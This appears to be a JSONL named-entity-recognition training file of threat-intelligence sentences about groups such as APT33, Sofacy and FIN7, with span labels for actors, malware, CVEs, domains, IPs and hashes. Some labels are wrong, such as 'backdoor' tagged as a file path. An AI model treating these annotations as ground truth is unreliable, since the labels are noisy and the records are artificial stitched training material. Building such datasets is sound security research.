"cyberner_stix_train"}}
{"text": "The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . On Tuesday , Arbor Networks said that it has new leads on a credential stealing remote access Trojan ( RAT ) called Ismdoor , possibly used by Greenbug to steal credentials on Shamoon 's behalf .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: zero-day vulnerability": [[65, 87]], "ORGANIZATION: Arbor Networks": [[260, 274]], "MALWARE: Trojan": [[341, 347]], "MALWARE: RAT": [[350, 353]], "MALWARE: Ismdoor": [[363, 370]]}, "info": {"id": "cyberner_stix_train_001491", "source": "cyberner_stix_train"}}
{"text": "In 2015 and 2016 , Dridex was one of the most prolific eCrime banking trojans on the market and , since 2014 , those efforts are thought to have netted INDRIK SPIDER millions of dollars in criminal profits . ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula .", "spans": {"TOOL: Dridex": [[19, 25]], "ORGANIZATION: banking": [[62, 69]], "THREAT_ACTOR: INDRIK SPIDER": [[152, 165]], "THREAT_ACTOR: ScarCruft": [[208, 217]]}, "info": {"id": "cyberner_stix_train_001492", "source": "cyberner_stix_train"}}
{"text": "According to its profile at Google Play ( see Figure 2 ) the app reached a mere 10+ downloads . SWEED remains consistent across most of their campaigns in their use of spear-phishing emails with malicious attachments . DDoS malware floods a target 's network-connected service with an excessive number of request at once in order to overload the capacity of the server .", "spans": {"SYSTEM: Google Play": [[28, 39]], "THREAT_ACTOR: SWEED": [[96, 101]], "MALWARE: DDoS": [[219, 223]], "MALWARE: malware": [[224, 231]]}, "info": {"id": "cyberner_stix_train_001493", "source": "cyberner_stix_train"}}
{"text": "Figure 16 : integrating an in-house ad SDK Figure 17 : replacing original app activities with the malicious ad SDK activity Figure 18 : the malware showing ads on any activity being loaded Connecting the Dots As our malware sample analysis took the team closer to reveal the “ Agent Smith ” campaign in its entirety and it is here that the C & C server investigation enters the center stage . A Clever Kitten attack starts with the use of a web vulnerability scanner to conduct reconnaissance . Having dual monitoring services provides redundancy in case one of the monitoring processes is halted . Furthermore , the process that created the web shell was UMWorkerProcess.exe , the process responsible for Exchange Server ’s Unified Messaging Service .", "spans": {"THREAT_ACTOR: Clever Kitten": [[395, 408]], "TOOL: web vulnerability scanner": [[441, 466]], "SYSTEM: Exchange Server ’s Unified Messaging Service": [[706, 750]]}, "info": {"id": "cyberner_stix_train_001494", "source": "cyberner_stix_train"}}
{"text": "The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx” . The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents .", "spans": {"MALWARE: JavaScript": [[4, 14]], "FILEPATH: backdoor": [[270, 278]], "TOOL: emails": [[297, 303]]}, "info": {"id": "cyberner_stix_train_001495", "source": "cyberner_stix_train"}}
{"text": "Clicking the SMS link brings the user to a fake website that prompts them to download and install the FakeSpy APK , which is masquerading as a local postal service app . APT33 is an Iranian state-sponsored threat actor that has engaged in cyberespionage activities since at least 2013 . Our investigations revealed that the attackers drove around several cities in Russia , stealing money from ATMs belonging to different banks .", "spans": {"MALWARE: FakeSpy": [[102, 109]], "THREAT_ACTOR: APT33": [[170, 175]], "THREAT_ACTOR: attackers": [[324, 333]], "ORGANIZATION: banks": [[422, 427]]}, "info": {"id": "cyberner_stix_train_001496", "source": "cyberner_stix_train"}}
{"text": "JNI Bread has also tested our ability to analyze native code . The attacks discussed in this blog are related to an APT campaign commonly referred to as \" th3bug \" , named for the password the actors often use with their Poison Ivy malware . LoadDll Load a DLL into the specified process . This campaign also strays from Infys usual target group of Iranian individuals and entities , with victims of Foudre located in Sweden , the Netherlands , the U.S. , along with others across Europe , Iraq , and India .", "spans": {"MALWARE: Bread": [[4, 9]], "TOOL: Poison Ivy malware": [[221, 239]], "TOOL: LoadDll": [[242, 249]], "TOOL: DLL": [[257, 260]], "THREAT_ACTOR: Infys": [[321, 326]], "ORGANIZATION: Iranian individuals and entities": [[349, 381]], "THREAT_ACTOR: Foudre": [[400, 406]]}, "info": {"id": "cyberner_stix_train_001497", "source": "cyberner_stix_train"}}
{"text": "] com glancelove [ . APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military aviation capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim’s . The file collected system information , and then invoked a WMI instance in the rootsecuritycenter namespace to identify security products installed on the system before dropping more data collection malware .", "spans": {"THREAT_ACTOR: APT33": [[21, 26]], "ORGANIZATION: aviation": [[39, 47], [161, 169]], "ORGANIZATION: military": [[205, 213]]}, "info": {"id": "cyberner_stix_train_001498", "source": "cyberner_stix_train"}}
{"text": "The document presents itself as a standard macro document but has all of its text hidden until the victim enables macros .", "spans": {"TOOL: macro": [[43, 48]], "TOOL: macros": [[114, 120]]}, "info": {"id": "cyberner_stix_train_001499", "source": "cyberner_stix_train"}}
{"text": "In 2016 , these services protected over 1.4 billion devices , making Google one of the largest providers of on-device security services in the world : Identify PHAs using people , systems in the cloud , and data sent to us from devices Warn users about or blocking users from installing PHAs Continually scan devices for PHAs and other harmful threats Additionally , we are providing detailed technical information to help the security industry in our collective work against PHAs . Leafminer appears to be based in Iran and seems to be eager to learn from and capitalize on tools and techniques used by more advanced threat actors . While two of the compromised products no longer include the backdoor , one of the affected developers is still distributing the trojanized version : ironically , the game is named Infestation , and is produced by Thai developer Electronics Extreme . One of the most common ways that cybercriminals earn money is by selling data on the black market .", "spans": {"ORGANIZATION: Google": [[69, 75]], "THREAT_ACTOR: Leafminer": [[483, 492]], "THREAT_ACTOR: threat actors": [[618, 631]], "ORGANIZATION: Electronics Extreme": [[862, 881]], "THREAT_ACTOR: cybercriminals": [[917, 931]]}, "info": {"id": "cyberner_stix_train_001500", "source": "cyberner_stix_train"}}
{"text": "We believe that during the first half of 2010 , the Dukes slowly migrated from PinchDuke and started using a new infostealer malware toolset that we call CosmicDuke .", "spans": {"THREAT_ACTOR: Dukes": [[52, 57]], "MALWARE: PinchDuke": [[79, 88]], "MALWARE: CosmicDuke": [[154, 164]]}, "info": {"id": "cyberner_stix_train_001501", "source": "cyberner_stix_train"}}
{"text": "From the previous samples , we performed a passive DNS lookup on the IPs .", "spans": {"TOOL: IPs": [[69, 72]]}, "info": {"id": "cyberner_stix_train_001502", "source": "cyberner_stix_train"}}
{"text": "The WannaCry malware consists of two distinct components , one that provides ransomware functionality and a component used for propagation , which contains functionality to enable SMB exploitation capabilities . Analysis of compromised systems seen communicating with Bookworm C2 servers also confirms our speculation on targeting with a majority of systems existing within Thailand .", "spans": {"TOOL: WannaCry malware": [[4, 20]], "TOOL: SMB": [[180, 183]], "MALWARE: Bookworm C2 servers": [[268, 287]]}, "info": {"id": "cyberner_stix_train_001503", "source": "cyberner_stix_train"}}
{"text": "We believe this cluster of campaigns had a joint goal of gathering intelligence on the sentiments of the targeted 5 countries with respect to the plans being discussed at the time for the US to locate their “ European Interceptor Site ” missile defense base in Poland , with a related radar station that was intended to be located in the Czech Republic .", "spans": {}, "info": {"id": "cyberner_stix_train_001504", "source": "cyberner_stix_train"}}
{"text": "However , there are still two issues here : The numbers to contact for cancelling the subscription are not real The billing process commences even if you don ’ t hit the “ Confirm ” button Even if the disclosure here displayed accurate information , the user would often find that the advertised functionality of the app did not match the actual content . The first method , described in Part D.l , below , involves the \" Barlaiy \" and \" PlugXL \" malware , which the Barium Defendants propagate using phishing techniques . It connects to the first remote C&C that tries to contact it and succeeds in the handshake . When combined with the data from your vulnerability scanners , it delivers a full picture of the exposures in your environment .", "spans": {"TOOL: Barlaiy": [[422, 429]], "TOOL: PlugXL": [[438, 444]], "TOOL: C&C": [[555, 558]]}, "info": {"id": "cyberner_stix_train_001505", "source": "cyberner_stix_train"}}
{"text": "The attack campaign , named Gooligan , breached the security of over one million Google accounts . APT37 ( Reaper ) , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud . HexRaysDeob installs two callbacks when loading : It trick users into connecting their wallet with the goal of initiating transactions to drain their account .", "spans": {"MALWARE: Gooligan": [[28, 36]], "ORGANIZATION: Google": [[81, 87]], "THREAT_ACTOR: APT37": [[99, 104]], "THREAT_ACTOR: Reaper": [[107, 113]], "THREAT_ACTOR: state-sponsored group": [[139, 160]], "ORGANIZATION: financial company": [[189, 206]], "TOOL: HexRaysDeob": [[256, 267]]}, "info": {"id": "cyberner_stix_train_001506", "source": "cyberner_stix_train"}}
{"text": "Finally the payload is executed by rundll32.exe ( and the ordinal #1 in argument ) or by explorer.exe if the COM Object hijack is performed .", "spans": {"FILEPATH: rundll32.exe": [[35, 47]], "FILEPATH: explorer.exe": [[89, 101]]}, "info": {"id": "cyberner_stix_train_001507", "source": "cyberner_stix_train"}}
{"text": "Figure 3: BACKSWING Version 2Version 1:FireEye observed the first version of BACKSWING in late 2016 on websites belonging to a Czech Republic hospitality organization in addition to a government website in Montenegro . The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 .", "spans": {"ORGANIZATION: 1:FireEye": [[37, 46]], "MALWARE: BACKSWING": [[77, 86]], "ORGANIZATION: hospitality organization": [[142, 166]], "ORGANIZATION: government": [[184, 194]], "ORGANIZATION: Kaspersky": [[236, 245]], "VULNERABILITY: zero-day": [[271, 279]], "VULNERABILITY: exploit": [[280, 287]], "THREAT_ACTOR: BlackOasis": [[296, 306]]}, "info": {"id": "cyberner_stix_train_001508", "source": "cyberner_stix_train"}}
{"text": "This gives users a chance to see details and better understand any changes made . While attribution of the first two spear phishing attacks is still uncertain , we attribute the second December phishing campaign to the China-based APT group that we refer to as APT16 . The controller provided the malware with base64-encoded data to be . Who is The Chaos Creator , and what else transpired between Harrison and Ashley Madison prior to his death ?", "spans": {"THREAT_ACTOR: APT group": [[231, 240]], "THREAT_ACTOR: APT16": [[261, 266]], "ORGANIZATION: The Chaos Creator": [[345, 362]], "ORGANIZATION: Harrison": [[398, 406]], "ORGANIZATION: Ashley Madison": [[411, 425]]}, "info": {"id": "cyberner_stix_train_001509", "source": "cyberner_stix_train"}}
{"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . the targeted system with a piece of malware called HyperBro , a Remote Access Trojan ( RAT ) .", "spans": {"MALWARE: malicious Microsoft Word document": [[90, 123]], "VULNERABILITY: CVE-2012-0158": [[143, 156]], "MALWARE: HyperBro": [[252, 260]], "MALWARE: Remote Access Trojan": [[265, 285]], "MALWARE: RAT": [[288, 291]]}, "info": {"id": "cyberner_stix_train_001510", "source": "cyberner_stix_train"}}
{"text": "Whether or not rooting succeeds , HummingBad downloads a large number of apps . The WannaCry malware consists of two distinct components , one that provides ransomware functionality and a component used for propagation , which contains functionality to enable SMB exploitation capabilities . APT33 : 64.251.19.217 [REDACTED].myftp.org . Here are some reasons why : • No WebSocket being used To complicate things , we observed some stores that had both skimmers at the same time , which is another reason why we believe they are not related : We started calling this new skimmer ' Kritec ' after one of its domain names .", "spans": {"MALWARE: HummingBad": [[34, 44]], "TOOL: WannaCry malware": [[84, 100]], "TOOL: SMB": [[260, 263]], "THREAT_ACTOR: APT33": [[292, 297]], "IP_ADDRESS: 64.251.19.217": [[300, 313]], "DOMAIN: [REDACTED].myftp.org": [[314, 334]], "TOOL: WebSocket": [[370, 379]], "MALWARE: skimmers": [[452, 460]], "MALWARE: skimmer": [[570, 577]], "MALWARE: Kritec": [[580, 586]]}, "info": {"id": "cyberner_stix_train_001511", "source": "cyberner_stix_train"}}
{"text": "Pharmaceutical companies .", "spans": {"ORGANIZATION: Pharmaceutical companies": [[0, 24]]}, "info": {"id": "cyberner_stix_train_001512", "source": "cyberner_stix_train"}}
{"text": "Sofacy Group’s Parallel Attacks .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]]}, "info": {"id": "cyberner_stix_train_001513", "source": "cyberner_stix_train"}}
{"text": "FBI has high confidence that HIDDEN COBRA actors are using the IP S-PROT addresses for further network exploitation .", "spans": {"ORGANIZATION: FBI": [[0, 3]], "THREAT_ACTOR: HIDDEN COBRA": [[29, 41]], "TOOL: IP S-PROT addresses": [[63, 82]]}, "info": {"id": "cyberner_stix_train_001515", "source": "cyberner_stix_train"}}
{"text": "like execute specialized machine instruction that are not virtualized We are publishing below the ( hopefully ) complete list of opcodes used by FinFisher VM that we found during our analysis and integrated into our de-virtualization script : INDEX MNEMONIC DESCRIPTION 0x0 EXEC Execute machine code 0x1 JG Jump if greater/Jump if not less or equal 0x2 WRITE Write a value into the dereferenced internal VM value ( treated as a pointer ) 0x3 JNO Jump if not overflow 0x4 JLE Jump While it lacks more advanced functionality like screen capturing , it is still able to carry out most tasks desired by threat actors : exfiltration of files , ability to download and execute additional payloads , and gain remote shell access . We do not know the motives of the attackers at this point . 3AM is written in Rust and appears to be a completely new malware family .", "spans": {"MALWARE: FinFisher": [[145, 154]], "THREAT_ACTOR: threat actors": [[599, 612]], "MALWARE: 3AM": [[784, 787]], "TOOL: Rust": [[802, 806]]}, "info": {"id": "cyberner_stix_train_001516", "source": "cyberner_stix_train"}}
{"text": "The new malware appears to be linked to the infamous Wolf Research organization and targets Android devices located in Thailand . Instead , the group often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware . Most of the IP addresses of IXESHE ’s victims are linked to DSL networks , which made it difficult to determine their identities . The tactics , techniques and procedures ( TTPs ) are very similar to those of SocGholish and it would be easy to think the two are related .", "spans": {"ORGANIZATION: Wolf Research": [[53, 66]], "SYSTEM: Android": [[92, 99]], "TOOL: Winnti installer": [[172, 188]], "THREAT_ACTOR: IXESHE": [[337, 343]], "TOOL: DSL": [[369, 372]], "MALWARE: SocGholish": [[518, 528]]}, "info": {"id": "cyberner_stix_train_001517", "source": "cyberner_stix_train"}}
{"text": "While we have observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks , we have not thus far observed TEMP.Reaper use their wiper malware actively against any targets . Whitefly first infects its victims using a dropper in the form of a malicious.exe or .dll file that is disguised as a document or image .", "spans": {"THREAT_ACTOR: TEMP.Hermit": [[74, 85]], "THREAT_ACTOR: TEMP.Reaper": [[161, 172]], "THREAT_ACTOR: Whitefly": [[228, 236]], "MALWARE: dropper": [[271, 278]], "FILEPATH: malicious.exe": [[296, 309]], "FILEPATH: .dll file": [[313, 322]]}, "info": {"id": "cyberner_stix_train_001518", "source": "cyberner_stix_train"}}
{"text": "During incidents that involved BitPaymer , Dridex was installed on the victim network prior to the deployment of the BitPaymer malware . The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload .", "spans": {"TOOL: BitPaymer": [[31, 40]], "TOOL: Dridex": [[43, 49]], "TOOL: BitPaymer malware": [[117, 134]], "MALWARE: downloader": [[141, 151]], "MALWARE: malware": [[152, 159]], "TOOL: C2": [[208, 210]]}, "info": {"id": "cyberner_stix_train_001519", "source": "cyberner_stix_train"}}
{"text": "In these instances , APT41 leveraged TeamViewer to transfer malware into the compromised environment , although we do not have direct evidence of APT41 compromising TeamViewer . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 .", "spans": {"THREAT_ACTOR: APT41": [[21, 26], [146, 151]], "TOOL: TeamViewer": [[37, 47]], "THREAT_ACTOR: Patchwork": [[187, 196]], "FILEPATH: RTF files": [[223, 232]], "VULNERABILITY: CVE-2017-8570": [[244, 257]]}, "info": {"id": "cyberner_stix_train_001520", "source": "cyberner_stix_train"}}
{"text": "] com/ hxxp : //www [ . The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . The macro would call an encoded PowerShell script and then use a series of techniques to download and execute both a Ursnif and GandCrab variant . The URLs provided access to the C2s , along with commands and encrypted transfers of additional backdoors onto the system via GIF files .", "spans": {"THREAT_ACTOR: Sofacy group": [[28, 40]], "VULNERABILITY: Flash exploits": [[84, 98]], "TOOL: Carberp": [[116, 123]], "TOOL: JHUHUGIT downloaders": [[130, 150]], "TOOL: PowerShell": [[215, 225]], "MALWARE: Ursnif": [[300, 306]], "MALWARE: GandCrab": [[311, 319]]}, "info": {"id": "cyberner_stix_train_001521", "source": "cyberner_stix_train"}}
{"text": "] cc/TiktokPro . Gamaredon Group's implants are characterized by the employment of information stealing tools — among them being screenshot and document stealers delivered via a SFX , and made to achieve persistence through a scheduled task . Ids.me .", "spans": {"THREAT_ACTOR: Gamaredon Group's": [[17, 34]], "TOOL: information stealing tools": [[83, 109]], "DOMAIN: Ids.me": [[243, 249]]}, "info": {"id": "cyberner_stix_train_001522", "source": "cyberner_stix_train"}}
{"text": "In addition , its original target list is extremely narrow and seems to be focused on Spanish banks . Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionairies . Dragonfly 2.0 is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least March 2016 .", "spans": {"MALWARE: Margarita": [[135, 144]], "THREAT_ACTOR: Dragonfly 2.0": [[264, 277]], "ORGANIZATION: government entities": [[325, 344]], "ORGANIZATION: critical infrastructure sectors": [[363, 394]]}, "info": {"id": "cyberner_stix_train_001523", "source": "cyberner_stix_train"}}
{"text": "An HTTP protocol with encrypted payload is used for the Command & Control communication .", "spans": {"TOOL: Command & Control": [[56, 73]]}, "info": {"id": "cyberner_stix_train_001524", "source": "cyberner_stix_train"}}
{"text": "] comfeteh-asefa [ . On May 2 , 2016 , Palo Alto Networks published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available . These themes cause APT1 command and control addresses to appear benign at first glance . These restrictions are specified by a list of allowed URIs .", "spans": {"ORGANIZATION: Palo Alto Networks": [[39, 57]], "THREAT_ACTOR: Infy": [[168, 172]], "THREAT_ACTOR: APT1": [[317, 321]], "SYSTEM: a list of allowed URIs": [[423, 445]]}, "info": {"id": "cyberner_stix_train_001525", "source": "cyberner_stix_train"}}
{"text": "For testing purposes we inserted a fake contacts list to our Android Emulator and observed resultant behavior . However , using NCC Group’s research published in May 2018 , we were able to discover code overlaps between these DLLs and a sideloaded DLL that ran the SysUpdate tool that the NCC group has associated with an Emissary Panda campaign . As the crisis in Syria escalates , FireEye researchers have discovered a cyber espionage campaign , which we call \" Ke3chang \" , that falsely advertises information updates about the ongoing crisis to compromise MFA networks in Europe .", "spans": {"SYSTEM: Android": [[61, 68]], "ORGANIZATION: NCC": [[128, 131], [289, 292]], "THREAT_ACTOR: Emissary Panda": [[322, 336]], "ORGANIZATION: FireEye": [[383, 390]], "THREAT_ACTOR: Ke3chang": [[464, 472]]}, "info": {"id": "cyberner_stix_train_001527", "source": "cyberner_stix_train"}}
{"text": "Two samples specifically , 25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8 and 115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03 provided additional artifacts we were able to pivot from to discover weaponized documents to deliver Zebrocy as well as a Koadic .", "spans": {"FILEPATH: 25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8": [[27, 91]], "FILEPATH: 115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03": [[96, 160]], "MALWARE: Zebrocy": [[262, 269]], "TOOL: Koadic": [[283, 289]]}, "info": {"id": "cyberner_stix_train_001528", "source": "cyberner_stix_train"}}
{"text": "Although Shamoon was previously documented in research blogs , the specific network compromise methods leading to the attacks have remained unclear in the reported cases .", "spans": {"MALWARE: Shamoon": [[9, 16]]}, "info": {"id": "cyberner_stix_train_001529", "source": "cyberner_stix_train"}}
{"text": "When the malware communicates with the C2 server , it uses a POST request with several predefined headers .", "spans": {"TOOL: C2": [[39, 41]]}, "info": {"id": "cyberner_stix_train_001530", "source": "cyberner_stix_train"}}
{"text": "To carry out this functionality , after writing the", "spans": {}, "info": {"id": "cyberner_stix_train_001531", "source": "cyberner_stix_train"}}
{"text": "Evidence also suggests that APT32 has targeted network security and technology infrastructure corporations with connections to foreign investors . On May 2 , 2016 , Palo Alto published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available .", "spans": {"THREAT_ACTOR: APT32": [[28, 33]], "ORGANIZATION: network security": [[47, 63]], "ORGANIZATION: technology infrastructure corporations": [[68, 106]], "ORGANIZATION: Palo Alto": [[165, 174]]}, "info": {"id": "cyberner_stix_train_001532", "source": "cyberner_stix_train"}}
{"text": "Once inside the network , Artifact #1 can be enough for the attacker to download or create additional scripts , execute commands and exfiltrate data ( for example , simply through ftp ) .", "spans": {}, "info": {"id": "cyberner_stix_train_001533", "source": "cyberner_stix_train"}}
{"text": "Collapsing the collection back down , note the two domains “ brontorittoozzo.com ” and “ randomessstioprottoy.net ” that fall outside of the collection due to more infrastructure connections .", "spans": {"DOMAIN: brontorittoozzo.com": [[61, 80]], "DOMAIN: randomessstioprottoy.net": [[89, 113]]}, "info": {"id": "cyberner_stix_train_001534", "source": "cyberner_stix_train"}}
{"text": "] nampriknum [ . We believe the 2013 , 2015 , and 2016 KeyBoy samples provide evidence of a development effort focused on changing components that would be used by researchers to develop detection signatures . We observed an example of this phenomenon around May . While there is a very large number of vulnerable websites , we already see some that have been injected with multiple different malicious code .", "spans": {"TOOL: KeyBoy samples": [[55, 69]]}, "info": {"id": "cyberner_stix_train_001535", "source": "cyberner_stix_train"}}
{"text": "After downloading , it will be loaded by the main module via DexClassLoader api : As mentioned , we observed a payload that exclusively targets the WhatsApp messenger and it does so in an original way . What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists , human rights defenders , trade unions and labour rights activists , many of whom are seemingly involved in the issue of migrants’ rights in Qatar and Nepal . The group appears to have targeted academic institutions , but its motives remain unclear .", "spans": {"SYSTEM: WhatsApp messenger": [[148, 166]]}, "info": {"id": "cyberner_stix_train_001536", "source": "cyberner_stix_train"}}
{"text": "This particular unit is believed to hack into victim companies throughout the world in order to steal corporate trade secrets , primarily relating to the satellite , aerospace and communication industries . The computers of diplomats , military attachés , private assistants , secretaries to Prime Ministers , journalists and others are under the concealed control of unknown assailant .", "spans": {"ORGANIZATION: aerospace": [[166, 175]], "ORGANIZATION: communication industries": [[180, 204]], "ORGANIZATION: diplomats": [[224, 233]], "ORGANIZATION: military attachés": [[236, 253]], "ORGANIZATION: private assistants": [[256, 274]], "ORGANIZATION: secretaries": [[277, 288]], "ORGANIZATION: Prime Ministers": [[292, 307]], "ORGANIZATION: journalists": [[310, 321]]}, "info": {"id": "cyberner_stix_train_001537", "source": "cyberner_stix_train"}}
{"text": "Within each variant , the malicious code present in each sample may look nearly identical with only one evasion technique changed . In 2016 , for instance , we found their campaigns attacking Japanese organizations with various malware tools , notably the Elirks backdoor . In versions 3.22 and 3.39 the routine changes . None Organizations should apply the November 8 , 2022 patches for Exchange to prevent exploitation since the URL rewrite mitigations for ProxyNotShell are not effective against this exploit method .", "spans": {"TOOL: Elirks backdoor": [[256, 271]], "VULNERABILITY: ProxyNotShell": [[459, 472]]}, "info": {"id": "cyberner_stix_train_001538", "source": "cyberner_stix_train"}}
{"text": "TG-3390 : castle.blackcmd.com .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "DOMAIN: castle.blackcmd.com": [[10, 29]]}, "info": {"id": "cyberner_stix_train_001539", "source": "cyberner_stix_train"}}
{"text": "In March 2016 , CTU researchers identified a spearphishing campaign using Bitly accounts to shorten malicious URLs .", "spans": {"ORGANIZATION: CTU": [[16, 19]], "TOOL: Bitly": [[74, 79]]}, "info": {"id": "cyberner_stix_train_001540", "source": "cyberner_stix_train"}}
{"text": "The threat actors , observed by FireEye Labs , use a variety of different methods to either compromise or acquire already compromised payment card credentials , including sharing or purchasing dumps online , hacking vulnerable merchant websites and compromising payment card processing devices . In some other cases , LEAD gains access to a target by brute-forcing remote access login credentials , performing SQL injection , or exploiting unpatched web servers , and then they copy the Winnti installer directly to compromised machines .", "spans": {"THREAT_ACTOR: actors": [[11, 17]], "ORGANIZATION: FireEye Labs": [[32, 44]], "MALWARE: Winnti installer": [[487, 503]]}, "info": {"id": "cyberner_stix_train_001541", "source": "cyberner_stix_train"}}
{"text": "Like many such groups , PLATINUM seeks to steal sensitive intellectual property related to government interests , but its range of preferred targets is consistently limited to specific governmental organizations , defense institutes , intelligence agencies , diplomatic institutions , and telecommunication providers in South and Southeast Asia . Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Uzbekistan in China .", "spans": {"THREAT_ACTOR: groups": [[15, 21]], "THREAT_ACTOR: PLATINUM": [[24, 32]], "ORGANIZATION: government": [[91, 101]], "ORGANIZATION: governmental organizations": [[185, 211]], "ORGANIZATION: defense institutes": [[214, 232]], "ORGANIZATION: intelligence agencies": [[235, 256]], "ORGANIZATION: diplomatic institutions": [[259, 282]], "ORGANIZATION: telecommunication providers": [[289, 316]], "ORGANIZATION: Unit 42": [[347, 354]], "ORGANIZATION: Foreign Ministry": [[431, 447]]}, "info": {"id": "cyberner_stix_train_001542", "source": "cyberner_stix_train"}}
{"text": "When root privilege is gained , a shell backdoor and malicious RCSAndroid agent APK file will be installed The second method is to use a stealthy backdoor app such as ANDROIDOS_HTBENEWS.A , which was designed to bypass Google Play . While FIN7 has embedded VBE as OLE objects for over a year , they continue to update their script launching mechanisms . . A careful analysis of the domain registrations from this threat actor between 2014 and 2015 allowed us to identify one profile used to register several domains that were used as C&C servers for a particular malware family employed by the Winnti group .", "spans": {"MALWARE: RCSAndroid": [[63, 73]], "MALWARE: ANDROIDOS_HTBENEWS.A": [[167, 187]], "SYSTEM: Google Play": [[219, 230]], "THREAT_ACTOR: FIN7": [[239, 243]], "TOOL: VBE": [[257, 260]]}, "info": {"id": "cyberner_stix_train_001543", "source": "cyberner_stix_train"}}
{"text": "0c458dfe0a2a01ab300c857fdc3373b75fbb8ccfa23d16eff0d6ab888a1a28f6", "spans": {"FILEPATH: 0c458dfe0a2a01ab300c857fdc3373b75fbb8ccfa23d16eff0d6ab888a1a28f6": [[0, 64]]}, "info": {"id": "cyberner_stix_train_001544", "source": "cyberner_stix_train"}}
{"text": "This way , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": {"MALWARE: malware": [[15, 22]], "MALWARE: Confucius' backdoors": [[150, 170]], "VULNERABILITY: CVE-2015-1641": [[255, 268]], "VULNERABILITY: CVE-2017-11882": [[273, 287]]}, "info": {"id": "cyberner_stix_train_001545", "source": "cyberner_stix_train"}}
{"text": "The malicious apps can steal personally identifiable and financial data and install additional apps . First attack of this campaign took place in May 2018 . The “ wprgxyeqd79.exe ” sample actually is a Self Extracting Archive ( SFX S-TOOL/SFA ) containing four files designed to be extracted in the %TEMP% folder .", "spans": {"FILEPATH: wprgxyeqd79.exe": [[163, 178]], "TOOL: Self Extracting Archive": [[202, 225]], "TOOL: SFX S-TOOL/SFA": [[228, 242]]}, "info": {"id": "cyberner_stix_train_001546", "source": "cyberner_stix_train"}}
{"text": "However , based upon the timeframe of subsequent telemetry we observe , we understand the attack chain as follows :", "spans": {}, "info": {"id": "cyberner_stix_train_001547", "source": "cyberner_stix_train"}}
{"text": "The similarity to common spam may however also serve a more devious purpose .", "spans": {}, "info": {"id": "cyberner_stix_train_001548", "source": "cyberner_stix_train"}}
{"text": "We see that this file drops 2 additional files : netwf.bat and netwf.dll .", "spans": {"FILEPATH: netwf.bat": [[49, 58]], "FILEPATH: netwf.dll": [[63, 72]]}, "info": {"id": "cyberner_stix_train_001549", "source": "cyberner_stix_train"}}
{"text": "Then , it will add the result of the public method localDate.getTime ( ) , which simply gets the current date . TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems . Data about Wingbird activity indicates that it is typically used to attack individuals and individual computers instead of networks .", "spans": {}, "info": {"id": "cyberner_stix_train_001550", "source": "cyberner_stix_train"}}
{"text": "MALWARE TECHNICAL DETAILS During our investigation , researchers uncovered a malware known as \" Gustuff. '' . In order to gain any further credentials , APT10 will usually deploy credential theft tools such as mimikatz or PwDump , sometimes using DLL load order hijacking , to use against a domain controller , explained further in Annex B . ASUS Live Update is an utility that is pre-installed on most ASUS computers and is used to automatically update certain components such as BIOS , UEFI , drivers and applications . The contents found in secure[.]66[.]to often lead to zhu[.]vn , which is Hack520 ’s domain for hosting his own private blog .", "spans": {"MALWARE: Gustuff.": [[96, 104]], "THREAT_ACTOR: APT10": [[153, 158]], "TOOL: mimikatz": [[210, 218]], "TOOL: PwDump": [[222, 228]], "TOOL: DLL load order hijacking": [[247, 271]], "TOOL: ASUS Live Update": [[342, 358]], "ORGANIZATION: ASUS": [[403, 407]], "TOOL: BIOS": [[481, 485]], "TOOL: UEFI": [[488, 492]], "TOOL: drivers": [[495, 502]], "TOOL: applications": [[507, 519]]}, "info": {"id": "cyberner_stix_train_001551", "source": "cyberner_stix_train"}}
